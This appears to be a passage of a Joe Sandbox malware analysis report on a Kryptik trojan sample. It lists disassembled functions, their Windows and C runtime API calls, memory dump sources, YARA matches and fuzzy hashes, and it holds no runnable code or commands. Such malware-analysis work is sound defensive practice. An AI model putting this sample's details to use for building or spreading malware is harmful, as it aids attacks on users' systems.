                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 10003A5F
                                                              • _ValidateLocalCookies.LIBCMT ref: 10003AE8
                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 10003B13
                                                              • _ValidateLocalCookies.LIBCMT ref: 10003B68
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                              • String ID: csm
                                                              • API String ID: 1170836740-1018135373
                                                              • Opcode ID: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                              • Instruction ID: 53213870faae5245fec6ed73a44d54790f208d332314260de239e107b7581961
                                                              • Opcode Fuzzy Hash: 618cc4b1c9e8ab126c58b9dfa5104022869f7905af091c597ce0ca7ba0b792b2
                                                              • Instruction Fuzzy Hash: 2A41E434A002189FDF02CF68C881A9FBBF9EF453A8F11C065E9149B356C771EA15CB91
                                                              Function 0041E803 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • VA, xrefs: 0041E854
                                                              • C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, xrefs: 0041E808
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe$VA
                                                              • API String ID: 0-3003594799
                                                              • Opcode ID: bbc246354933274b12cc74a321791b42bb805874b1c62c20345f16d1b2f24b5d
                                                              • Instruction ID: 2b41407daedabdefeb68af409a406bd3dd60cc27b104900d0df700e292202cc0
                                                              • Opcode Fuzzy Hash: bbc246354933274b12cc74a321791b42bb805874b1c62c20345f16d1b2f24b5d
                                                              • Instruction Fuzzy Hash: A421B075604105AF9B20BF638C419EB77ADEF013A8710852BFD2587251E739EC819768
                                                              Function 004198F8 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 0-537541572
                                                              • Opcode ID: ab3301201762d8709fda81139749348a43ff2ca55212c488a12608a7673bf9c9
                                                              • Instruction ID: a0b7181f714cca58eaa4ddaccdd8282d036359da2c95a804dd2d27402f6bcf77
                                                              • Opcode Fuzzy Hash: ab3301201762d8709fda81139749348a43ff2ca55212c488a12608a7673bf9c9
                                                              • Instruction Fuzzy Hash: 2A212BB1A21224ABCB314B259C51BEF77689F417A0F21012EED46A7390DB38ED41C5ED
                                                              Function 100072FC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: api-ms-$ext-ms-
                                                              • API String ID: 0-537541572
                                                              • Opcode ID: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                              • Instruction ID: 4a8ea71034e84b8525c0961ad639e20c08c2bf99947945f029ec6b94e21b7784
                                                              • Opcode Fuzzy Hash: cde85c6b5c8b57cdf34b7df1744eca22314f2c72a21997f039bbb8b7806936d4
                                                              • Instruction Fuzzy Hash: DC219671E01321EBF722DB648C81A4E37A4FB456E0B214124ED59A7195D778EE00A6E1
                                                              Function 0219036C Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 021900B8: _free.LIBCMT ref: 021900DD
                                                              • _free.LIBCMT ref: 021903BA
                                                                • Part of subcall function 0218994F: HeapFree.KERNEL32(00000000,00000000,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?), ref: 02189965
                                                                • Part of subcall function 0218994F: GetLastError.KERNEL32(?,?,021900E2,?,00000000,?,?,?,02190385,?,00000007,?,?,02190878,?,?), ref: 02189977
                                                              • _free.LIBCMT ref: 021903C5
                                                              • _free.LIBCMT ref: 021903D0
                                                              • _free.LIBCMT ref: 02190424
                                                              • _free.LIBCMT ref: 0219042F
                                                              • _free.LIBCMT ref: 0219043A
                                                              • _free.LIBCMT ref: 02190445
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: 800aa5c3ccae66d18581fa224c31917642b9d86138236abd6320ecb2878ee498
                                                              • Instruction ID: 7d3484cd0c2d2d7154f1c105587bb0d7a3395ea5b27bb6173b1d91c44a58151b
                                                              • Opcode Fuzzy Hash: 800aa5c3ccae66d18581fa224c31917642b9d86138236abd6320ecb2878ee498
                                                              • Instruction Fuzzy Hash: 7D114C729C0F04EEDE61BFB0CC86FDB779EAF08740F444C15A299A6160DB65B5098F52
                                                              Function 00420105 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0041FE51: _free.LIBCMT ref: 0041FE76
                                                              • _free.LIBCMT ref: 00420153
                                                                • Part of subcall function 004196E8: RtlFreeHeap.NTDLL(00000000,00000000,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?), ref: 004196FE
                                                                • Part of subcall function 004196E8: GetLastError.KERNEL32(?,?,0041FE7B,?,00000000,?,?,?,0042011E,?,00000007,?,?,00420611,?,?), ref: 00419710
                                                              • _free.LIBCMT ref: 0042015E
                                                              • _free.LIBCMT ref: 00420169
                                                              • _free.LIBCMT ref: 004201BD
                                                              • _free.LIBCMT ref: 004201C8
                                                              • _free.LIBCMT ref: 004201D3
                                                              • _free.LIBCMT ref: 004201DE
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: _free$ErrorFreeHeapLast
                                                              • String ID:
                                                              • API String ID: 776569668-0
                                                              • Opcode ID: cdd5e4471268dfd21d5239b5f7fa74d2fa29ef36221d2afbd4b55f52868d9946
                                                              • Instruction ID: 19dd4c8c7b65d2d86164fed46a4597e2e19d2a81908c0efd60b677630b23bdd7
                                                              • Opcode Fuzzy Hash: cdd5e4471268dfd21d5239b5f7fa74d2fa29ef36221d2afbd4b55f52868d9946
                                                              • Instruction Fuzzy Hash: 75112E71681704AADA20B7B2CC56FCB779C9F00B04F40082BF29966073DA7DF9898659
                                                              Function 021924CE Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 02192516
                                                              • __fassign.LIBCMT ref: 021926FB
                                                              • __fassign.LIBCMT ref: 02192718
                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02192760
                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 021927A0
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 02192848
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 1735259414-0
                                                              • Opcode ID: 91191ee0e147da6a94128d3f7330e71c7d2df2151abf819d712ae4673ed49efa
                                                              • Instruction ID: 5d5c7eceaa90d7be89830ecff179b27a39dd49baf48407349749fd0b9bbea7d0
                                                              • Opcode Fuzzy Hash: 91191ee0e147da6a94128d3f7330e71c7d2df2151abf819d712ae4673ed49efa
                                                              • Instruction Fuzzy Hash: 5AC18C75D40258AFCF15CFA8C8909EDBBF6AF48314F28416AEC55BB241D7319946CF60
                                                              Function 00422267 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetConsoleOutputCP.KERNEL32(00000000,00000000,?), ref: 004222AF
                                                              • __fassign.LIBCMT ref: 00422494
                                                              • __fassign.LIBCMT ref: 004224B1
                                                              • WriteFile.KERNEL32(?,004244B3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004224F9
                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 00422539
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004225E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 1735259414-0
                                                              • Opcode ID: a6219b4c7093bb4832425b4a6c8eb892de67332f9088a6a6d1728d394167633a
                                                              • Instruction ID: 6b3e8d957b2b9e0b50a2a91a03589f5d996cc43ffc5c7e42b55ca35f77437dd4
                                                              • Opcode Fuzzy Hash: a6219b4c7093bb4832425b4a6c8eb892de67332f9088a6a6d1728d394167633a
                                                              • Instruction Fuzzy Hash: 85C1D071E00268AFCB14CFA8D9909EDFBB5AF08314F68816AE855F7341D6749D42CF58
                                                              Function 1000B6D8 Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 1000B720
                                                              • __fassign.LIBCMT ref: 1000B905
                                                              • __fassign.LIBCMT ref: 1000B922
                                                              • WriteFile.KERNEL32(?,10009A1A,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000B96A
                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 1000B9AA
                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 1000BA52
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                              • String ID:
                                                              • API String ID: 1735259414-0
                                                              • Opcode ID: 56600ca1f679adaeecf8f36430617c19199fd47716f68d51f6ae8f72f541c1cc
                                                              • Instruction ID: 817bf58f8fa712ded97291eda06853010b29bdec4c6be72b636a35a8a914ce65
                                                              • Opcode Fuzzy Hash: 56600ca1f679adaeecf8f36430617c19199fd47716f68d51f6ae8f72f541c1cc
                                                              • Instruction Fuzzy Hash: 9DC1CF75D006989FEB11CFE8C8809EDBBB5EF09354F28816AE855F7245D631AE42CB60
                                                              Function 0217CE00 Relevance: 9.2, APIs: 6, Instructions: 175COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,?,00000000,00000000,?,?,?,00000001), ref: 0217CE49
                                                              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000000,?,00000000,00000000), ref: 0217CEB4
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0217CED1
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0217CF10
                                                              • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0217CF6F
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0217CF92
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ByteCharMultiStringWide
                                                              • String ID:
                                                              • API String ID: 2829165498-0
                                                              • Opcode ID: 280e6a93f0dbf58af7c1136f8a33f3405dc4919f95456337fc1b616f5409793b
                                                              • Instruction ID: 622743a2f0f9926c515deb001a9ae13df7ab44625ea24be71c62baec65c978ed
                                                              • Opcode Fuzzy Hash: 280e6a93f0dbf58af7c1136f8a33f3405dc4919f95456337fc1b616f5409793b
                                                              • Instruction Fuzzy Hash: 0351AD7268021AAFEF209F64CC40FAFBBBAEF84754F25442AF915D6154DB30D914CB94
                                                              Function 0217AE47 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0217AE7D
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0217AEA0
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0217AEC0
                                                              • std::_Facet_Register.LIBCPMT ref: 0217AF22
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0217AF3A
                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 0217AF5D
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                              • String ID:
                                                              • API String ID: 2081738530-0
                                                              • Opcode ID: b885fbd9e08969445e8408afee0ad8d4617e431a29e76d4496445ec0c5d9d7bf
                                                              • Instruction ID: c225d9c51469b7c22ecd728fe973796c1c9a1671d31fc182e9189ae1037d3946
                                                              • Opcode Fuzzy Hash: b885fbd9e08969445e8408afee0ad8d4617e431a29e76d4496445ec0c5d9d7bf
                                                              • Instruction Fuzzy Hash: FC31E5B2A44219DFCB25DF54D840BAEB7B5FF84720F11016AD896A7380DB34A941CFD1
                                                              Function 0040ABE0 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040AC16
                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 0040AC39
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040AC59
                                                              • std::_Facet_Register.LIBCPMT ref: 0040ACBB
                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0040ACD3
                                                              • Concurrency::cancel_current_task.LIBCPMT ref: 0040ACF6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
                                                              • String ID:
                                                              • API String ID: 2081738530-0
                                                              • Opcode ID: 5c293808727baf58d0b78994ee596959b051c80a5145d9f106c0e32942314797
                                                              • Instruction ID: 42dd855bafadb820b2dbd196d0a58e7811000d19e1cacf42681462b4bf6c3cd6
                                                              • Opcode Fuzzy Hash: 5c293808727baf58d0b78994ee596959b051c80a5145d9f106c0e32942314797
                                                              • Instruction Fuzzy Hash: C7319FB1908219DFDB21DF54D980A6EB7B4FB04724F15423EE845773D1DB38A902CB8A
                                                              Function 0217FF4B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,0217FF42,0217E5C6,0217DC00), ref: 0217FF59
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0217FF67
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0217FF80
                                                              • SetLastError.KERNEL32(00000000,0217FF42,0217E5C6,0217DC00), ref: 0217FFD2
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 680a329933b96cb53ae5c265fb9cc4498949d1d82d710ca85a3e381c7e918393
                                                              • Instruction ID: 17ddd7c1ce539698b0f5cc94817012d9e948b9de6ea39080b77149fcb2d46d59
                                                              • Opcode Fuzzy Hash: 680a329933b96cb53ae5c265fb9cc4498949d1d82d710ca85a3e381c7e918393
                                                              • Instruction Fuzzy Hash: 0501D4332CD6257EE6393778BCC466B2676DB4277A731533AE528968E0EF1248039D48
                                                              Function 0040FCE4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(?,?,0040FCDB,0040E35F,0040D999), ref: 0040FCF2
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040FD00
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040FD19
                                                              • SetLastError.KERNEL32(00000000,0040FCDB,0040E35F,0040D999), ref: 0040FD6B
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 680a329933b96cb53ae5c265fb9cc4498949d1d82d710ca85a3e381c7e918393
                                                              • Instruction ID: d2200d1a55058c355170767e85ccfcbc04d90dd67b8a9ae15d7249d72c620bb9
                                                              • Opcode Fuzzy Hash: 680a329933b96cb53ae5c265fb9cc4498949d1d82d710ca85a3e381c7e918393
                                                              • Instruction Fuzzy Hash: 6201283224D31D5EE63826756C4659B2A54EF11775730023FF411751E2EF7D0C8A554C
                                                              Function 10003DFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00000001,?,10003C01,10002DB0,100027A7,?,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8), ref: 10003E08
                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 10003E16
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003E2F
                                                              • SetLastError.KERNEL32(00000000,100029DF,?,00000001,?,?,00000001,?,100167D8,0000000C,10002AD8,?,00000001,?), ref: 10003E81
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: ErrorLastValue___vcrt_
                                                              • String ID:
                                                              • API String ID: 3852720340-0
                                                              • Opcode ID: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                              • Instruction ID: cea4d4d1ab0609a38d25ccf127c64f3389598815618148a6298b3cccc824aafb
                                                              • Opcode Fuzzy Hash: 6af44c204d35e0e87e783e409bd385f4178bd984da96cbfbdded34095f80bc15
                                                              • Instruction Fuzzy Hash: 610124379083A66EF25BC7B49CC964B379AEB0D3F53208329F114410F8EFA29E45A244
                                                              Function 0218EA6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              • C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe, xrefs: 0218EA6F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953718488.0000000002170000.00000040.00001000.00020000.00000000.sdmp, Offset: 02170000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_2170000_SecuriteInfo.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: C:\Users\user\Desktop\SecuriteInfo.com.W32.Kryptik.LKE.gen.Eldorado.17641.17677.exe
                                                              • API String ID: 0-3288490397
                                                              • Opcode ID: 942b44d07ceeb41c0be3006577560e2bad2008f0503f87ddf01a6426efce1dc8
                                                              • Instruction ID: 31025233606e6b541e11b8a8546bd661e65b41daf053c7c7ff89d6d82d48d4bf
                                                              • Opcode Fuzzy Hash: 942b44d07ceeb41c0be3006577560e2bad2008f0503f87ddf01a6426efce1dc8
                                                              • Instruction Fuzzy Hash: 76216271684206BF9B24BF65CCC0D6B77AEEF043A4B114524F929D7190EB70EC018FA0
                                                              Function 00410D87 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00410E48,?,?,00438470,00000000,?,00410F73,00000004,InitializeCriticalSectionEx,00429B9C,InitializeCriticalSectionEx,00000000), ref: 00410E17
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: FreeLibrary
                                                              • String ID: api-ms-
                                                              • API String ID: 3664257935-2084034818
                                                              • Opcode ID: b02907538fd99b55170e1f1008d4e2625caf0628eb1d99c908a259ed80e5b8af
                                                              • Instruction ID: f93bafddc2c6944db94e1caf77ca7fb938f0b13048c967e4936ca7b24af3ac9f
                                                              • Opcode Fuzzy Hash: b02907538fd99b55170e1f1008d4e2625caf0628eb1d99c908a259ed80e5b8af
                                                              • Instruction Fuzzy Hash: 9611E331B41321ABCB325B69AC01B9E73A4AF02760F150526E901E7380DBB8FDC286DD
                                                              Function 00414CD1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00414CC6,?,?,00414C8E,00000000,74DEDF80,?), ref: 00414CE6
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00414CF9
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00414CC6,?,?,00414C8E,00000000,74DEDF80,?), ref: 00414D1C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2953320962.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.2953320962.000000000043A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 3717617a3a4dd42a780df557cb31e783c1a43f24c868797946e740d6e1b0b732
                                                              • Instruction ID: e2be2c7a9067ee3b760dcd4954630d509753a7993c03b47d75f7a554283c4f72
                                                              • Opcode Fuzzy Hash: 3717617a3a4dd42a780df557cb31e783c1a43f24c868797946e740d6e1b0b732
                                                              • Instruction Fuzzy Hash: D6F08230601119FBDB219B51ED09BEE7B68EB40752F604065F900A12A0CF788E11DA98
                                                              Function 10005FAA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FBF
                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10005FD2
                                                              • FreeLibrary.KERNEL32(00000000,?,?,10005F5C,?,?,10005F24,?,?,?), ref: 10005FF5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2954294685.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000000.00000002.2954274750.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954315683.0000000010011000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                              • Associated: 00000000.00000002.2954333339.0000000010018000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_10000000_SecuriteInfo.jbxd
                                                              Similarity
                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                              • String ID: CorExitProcess$mscoree.dll
                                                              • API String ID: 4061214504-1276376045
                                                              • Opcode ID: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                              • Instruction ID: ce5d81a5a20928f213bfffb098e7a6005668583a74e8757c7f390ca8b74bdc84
                                                              • Opcode Fuzzy Hash: 72e1e31047de7c6f2cb357695238b525e407410b4f5b93aeb37e18346654144b
                                                              • Instruction Fuzzy Hash: 1BF01C31904129FBEB06DB91CD0ABEE7AB9EB047D6F1041B4F501A21A4CBB5CE41DB90
                                                              Function 004181BC Relevance: 7.8, APIs: 5, Instructions: 255COMMONLIBRARYCODE
                                                              Download Yara Rule
                                                              APIs
